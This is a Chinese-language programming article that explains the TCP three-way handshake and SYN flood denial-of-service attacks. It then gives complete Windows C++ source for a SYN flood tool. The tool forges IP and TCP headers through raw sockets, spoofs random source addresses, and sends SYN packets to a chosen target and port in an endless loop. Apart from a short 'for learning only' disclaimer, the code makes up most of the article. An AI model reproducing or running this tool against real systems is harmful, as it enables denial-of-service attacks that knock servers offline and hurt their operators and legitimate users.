SYN_FLOOD 简单分析及实现

类别:编程语言 点击:0 评论:0 推荐:

SYN_FLOOD 简单分析及实现

WriteBy: LionD8

email:[email protected]

声明:

此程序有一定攻击性,请只供学习之用,不要危害祖国的网络。如发动攻击一切后果本人概不负责。

网络上发送数据包的攻击有多种(如ICMP_FLOOD, 碎片攻击,等)其中有一种就是 利用TCP 协议三次 握手的攻击(SYN_FLOOD)。下面 就简单 讲述一下 TCP 的三次 握手。

现在 有A,B 两台 机器,其中B是SERVER.A是CLIENT.

首先 A 发送送一个 带有SYN标记(带起始序列号)的数据报 给B。

然后 B 接收, 然后 发送一个ACK+SYN(带B机的起始序列号 和 A的确认号)给A。

最后 A 再发送 一个带序列号 和 确认号的 数据报 给 B。

此时 连接 完成。

利用这个原理,如果A机在第一步伪装大量不存在的机器,给B发送大量的SYN包,那么B会以为有很多合法的机器请求连接,然后一一回应。然后等待第三次 确认建立连接。那么大量等待连接的请求被保留在栈中。一般服务器等待2分钟还没等到第三次握手,那么就会从等待连接的栈中删除连接请求。如果A的SYN发送得足够快,合法用户连接不上,那么服务器也会花费大量的资源来维护栈。从而照成D.o.S攻击。

通过RAW_SOCKET,只要你是管理员,就可以伪造IP和TCP头部,发虚假源地址的SYN请求。

==========================================

简单实现如下:

/* FLOOD.CPP*/

#include <stdio.h>

#include <winsock2.h>

#include <ws2tcpip.h>

#include <windows.h>

#include <time.h>

#include <dos.h>

#pragma comment(lib, "ws2_32.lib")

#define MAX_RECEIVEBYTE 255

typedef struct ip_head //定义IP首部

{

unsigned char h_verlen; //4位首部长度,4位IP版本号

unsigned char tos; //8位服务类型TOS

unsigned short total_len; //16位总长度(字节)

unsigned short ident; //16位标识

unsigned short frag_and_flags; //3位标志位 (如SYN,ACK,等)

unsigned char ttl; //8位生存时间 TTL

unsigned char proto; //8位协议 (如ICMP,TCP等)

unsigned short checksum; //16位IP首部校验和

unsigned int sourceIP; //32位源IP地址

unsigned int destIP; //32位目的IP地址

}IPHEADER;

typedef struct tcp_head //定义TCP首部

{

USHORT th_sport; //16位源端口

USHORT th_dport; //16位目的端口

unsigned int th_seq; //32位序列号

unsigned int th_ack; //32位确认号

unsigned char th_lenres; //4位首部长度/6位保留字

unsigned char th_flag; //6位标志位

USHORT th_win; //16位窗口大小

USHORT th_sum; //16位校验和

USHORT th_urp; //16位紧急数据偏移量

}TCPHEADER;

typedef struct tsd_head //定义TCP伪首部

{

unsigned long saddr; //源地址

unsigned long daddr; //目的地址

char mbz;

char ptcl; //协议类型

unsigned short tcpl; //TCP长度

}PSDHEADER;

//CheckSum:计算校验和的子函数

USHORT checksum(USHORT *buffer, int size)

{

unsigned long cksum=0;

while(size >1)

{

cksum+=*buffer++;

size -=sizeof(USHORT);

}

if(size)

{

cksum += *(UCHAR*)buffer;

}

cksum = (cksum >> 16) + (cksum & 0xffff);

cksum += (cksum >>16);

return (USHORT)(~cksum);

}

 

void usage()

{

printf("***********************************************************");

printf("SYN_FLOOD MADE BY LionD8");

printf("Useage: FLOOD Target_ip Target_port Delay_time ");

printf("***********************************************************");

}

//Delay_time单位为毫秒。

int main(int argc, char* argv[])

{

WSADATA WSAData;

SOCKET sock;

SOCKADDR_IN addr_in;

IPHEADER ipHeader;

TCPHEADER tcpHeader;

PSDHEADER psdHeader;

int SourcePort;

char szSendBuf[60]={0};

BOOL flag;

int rect,nTimeOver;

int sleeptime;

usage();

if (argc < 3 || argc >4 )

{ printf("input error! ");

return false; }

if (argc==4) sleeptime=atoi(argv[3]);

else sleeptime=300;

if (WSAStartup(MAKEWORD(2,2), &WSAData)!=0)

{

printf("WSAStartup Error!");

return false;

}

sock=NULL;

if ((sock=socket(AF_INET,SOCK_RAW,IPPROTO_IP))==INVALID_SOCKET)

{

printf("Socket Setup Error!");

return false;

}

flag=true;

if (setsockopt(sock,IPPROTO_IP, IP_HDRINCL,(char *)&flag,sizeof(flag))==SOCKET_ERROR)

{

printf("setsockopt IP_HDRINCL error!");

return false;

}

nTimeOver=1000;

if (setsockopt(sock, SOL_SOCKET, SO_SNDTIMEO, (char*)&nTimeOver, sizeof(nTimeOver))==SOCKET_ERROR) //设置发送的时间

{

printf("setsockopt SO_SNDTIMEO error!");

return false;

}

addr_in.sin_family=AF_INET;

addr_in.sin_port=htons(atoi(argv[2]));

addr_in.sin_addr.S_un.S_addr=inet_addr(argv[1]);

while(TRUE)

{

//填充IP首部

ipHeader.h_verlen=(4<<4 | sizeof(ipHeader)/sizeof(unsigned long));

ipHeader.tos=0;

ipHeader.total_len=htons(sizeof(ipHeader)+sizeof(tcpHeader)); //IP总长度

ipHeader.ident=1;

ipHeader.frag_and_flags=0; //无分片

ipHeader.ttl=(unsigned char)GetTickCount()%87+123;

ipHeader.proto=IPPROTO_TCP; // 协议类型为 TCP

ipHeader.checksum=0; //效验位先初始为0

ipHeader.sourceIP=htonl(GetTickCount()*474695); //随机产生一个伪造的IP

ipHeader.destIP=inet_addr(argv[1]); //目标IP

//填充TCP首部

SourcePort=GetTickCount()*43557%9898; //随机产生一个端口号

tcpHeader.th_dport=htons(atoi(argv[2])); //发送的目的端口

tcpHeader.th_sport=htons(SourcePort); //源端口号

tcpHeader.th_seq=htonl(0x12345678); //序列号

tcpHeader.th_ack=0; //确认号

tcpHeader.th_lenres=(sizeof(tcpHeader)/4<<4|0);

tcpHeader.th_flag=2; //为SYN请求

tcpHeader.th_win=htons(512);

tcpHeader.th_urp=0;

tcpHeader.th_sum=0;

//填充TCP伪首部用来计算TCP头部的效验和

psdHeader.saddr=ipHeader.sourceIP;

psdHeader.daddr=ipHeader.destIP;

psdHeader.mbz=0;

psdHeader.ptcl=IPPROTO_TCP;

psdHeader.tcpl=htons(sizeof(tcpHeader));

//计算校验和

memcpy(szSendBuf, &psdHeader, sizeof(psdHeader));

memcpy(szSendBuf+sizeof(psdHeader), &tcpHeader, sizeof(tcpHeader));

tcpHeader.th_sum=checksum((USHORT *)szSendBuf,sizeof(psdHeader)+sizeof(tcpHeader));

//把伪造好的IP头 和 TCP 头 放进 buf 准备发送

memcpy(szSendBuf, &ipHeader, sizeof(ipHeader));

memcpy(szSendBuf+sizeof(ipHeader), &tcpHeader, sizeof(tcpHeader));

//发送数据包

rect=sendto(sock, szSendBuf, sizeof(ipHeader)+sizeof(tcpHeader), 0, (struct sockaddr*)&addr_in, sizeof(addr_in));

if (rect==SOCKET_ERROR)

{

printf("send error!:%x",WSAGetLastError());

return false;

}

else

printf("send ok!");

Sleep(sleeptime); //根据自己网速的快慢确定此值,sleeptime越小发得越快

}//endwhile //重新伪造IP的源地址等再次向目标发送

closesocket(sock);

WSACleanup();

return 0;

}

在VC++6.0 下编译通过。

本文地址:http://com.8s8s.com/it/it26321.htm